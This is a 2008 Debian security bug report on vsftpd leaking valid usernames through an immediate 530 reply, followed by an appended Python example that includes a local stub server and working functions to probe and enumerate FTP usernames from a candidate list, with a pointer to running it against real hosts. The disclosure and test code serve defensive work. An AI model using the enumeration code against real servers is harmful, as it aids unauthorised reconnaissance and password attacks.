Mark Hobley
2008-Dec-21 12:16 UTC
[Secure-testing-team] Bug#509333: vsftpd discloses whether usernames are valid or not
Package: vsftpd
Severity: grave
Tags: security
Justification: user security hole

The vsftpd daemon discloses whether usernames supplied by the client are valid or not. On connection to the server via a client, if an invalid username is supplied, a 530 error is immediately returned, instead of a password prompt being returned before failure.

Here is a sample session:

ftp despina
Connected to despina.markhobley.yi.org
220 Welcome to vsftpd server daemon
Name (despina:mark): shaggy
530 Permission denied.        <--- We should prompt for password
Login failed.                      before failing here.

By prompting for a password, the user would not know whether the username or the password is invalid. Without the password prompt, the user knows that the username is not valid, and can quickly perform a dictionary attack to obtain system usernames.

This vulnerability was first discovered in September 2003, and has not yet been patched.

http://securitytracker.com/id?1008628

Testing in December 2008 confirms that the bug is not fixed.

Mark.

-- System Information:
Debian Release: 5.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-1-486
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/dash

Versions of packages vsftpd depends on:
ii  adduser         3.110      add and remove users and groups
ii  libc6           2.7-16     GNU C Library: Shared libraries
ii  libcap1         1:1.10-14  support for getting/setting POSIX.
ii  libpam-modules  1.0.1-4    Pluggable Authentication Modules f
ii  libpam0g        1.0.1-4    Pluggable Authentication Modules l
ii  libssl0.9.8     0.9.8g-14  SSL shared libraries
ii  libwrap0        7.6.q-16   Wietse Venema's TCP wrappers libra
ii  netbase         4.34       Basic TCP/IP networking system

Versions of packages vsftpd recommends:
ii  logrotate       3.7.7-2    Log rotation utility

vsftpd suggests no packages.
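The following is an added example, not code from the bug report or from the vsftpd project. It shows the username-enumeration check the report describes in a runnable form: a probe that sends only the USER command and records the reply code, a loop that sorts a candidate list by whether the server answered 331 (password prompt) or 530 (rejected outright), and a single-request test for the oracle. Because the report's server is not reachable here, the block also contains a small constructed FTP stub (the KNOWN_USERS set, the reply strings and the function names are all assumptions) that mimics the behaviour shown in the sample session: 331 for a known name, 530 for any other.

```python
"""Detect FTP username enumeration via differing replies to USER.

Added example; the stub server below is constructed to imitate the
behaviour described in the report and is not vsftpd itself.
"""
import socketserver
import threading
from ftplib import FTP, error_perm

# Constructed stand-in for the leaky behaviour: names in KNOWN_USERS get a
# password prompt (331), anything else is refused at the USER step (530).
KNOWN_USERS = {"mark", "root"}


class _LeakyFTPHandler(socketserver.StreamRequestHandler):
    """Minimal FTP control-channel stub that answers USER like the report."""

    def handle(self):
        self.wfile.write(b"220 Welcome to vsftpd server daemon\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode("latin-1").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                if arg in KNOWN_USERS:
                    self.wfile.write(b"331 Please specify the password.\r\n")
                else:
                    self.wfile.write(b"530 Permission denied.\r\n")
            elif cmd == "PASS":
                self.wfile.write(b"530 Login incorrect.\r\n")
            elif cmd == "QUIT":
                self.wfile.write(b"221 Goodbye.\r\n")
                return
            else:
                self.wfile.write(b"530 Please login with USER and PASS.\r\n")


def start_leaky_server():
    """Start the stub on an ephemeral loopback port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), _LeakyFTPHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def probe_user(host, port, username, timeout=5):
    """Send only USER <username> and return the 3-digit reply code.

    ftplib raises error_perm for 5xx replies, so the code is recovered from
    the exception text in that case. No password is ever sent.
    """
    with FTP() as ftp:
        ftp.connect(host, port, timeout=timeout)
        try:
            resp = ftp.sendcmd("USER " + username)
        except error_perm as exc:
            resp = str(exc)
        return resp[:3]


def server_leaks_usernames(host, port, bogus="zzz-no-such-user-zzz"):
    """True if a name that cannot exist is refused at USER (530).

    Caveat: a server that answers 530 to every USER (e.g. local logins
    disabled) also trips this check; confirm with a name expected to exist.
    """
    return probe_user(host, port, bogus) == "530"


def enumerate_users(host, port, candidates):
    """Split candidates into (prompted_for_password, rejected_at_user)."""
    found, rejected = [], []
    for name in candidates:
        code = probe_user(host, port, name)
        (found if code == "331" else rejected).append(name)
    return found, rejected


def demo(candidates=("mark", "shaggy", "root", "scooby")):
    """Run the oracle test and the enumeration against the local stub."""
    srv, port = start_leaky_server()
    try:
        leaks = server_leaks_usernames("127.0.0.1", port)
        found, rejected = enumerate_users("127.0.0.1", port, candidates)
    finally:
        srv.shutdown()
        srv.server_close()
    return leaks, found, rejected


if __name__ == "__main__":
    print(demo())
```

Against a real host, call server_leaks_usernames and enumerate_users with its address instead of the stub; a server that has closed the hole answers 331 to every USER and only fails after PASS, so found will contain every candidate and the check returns False.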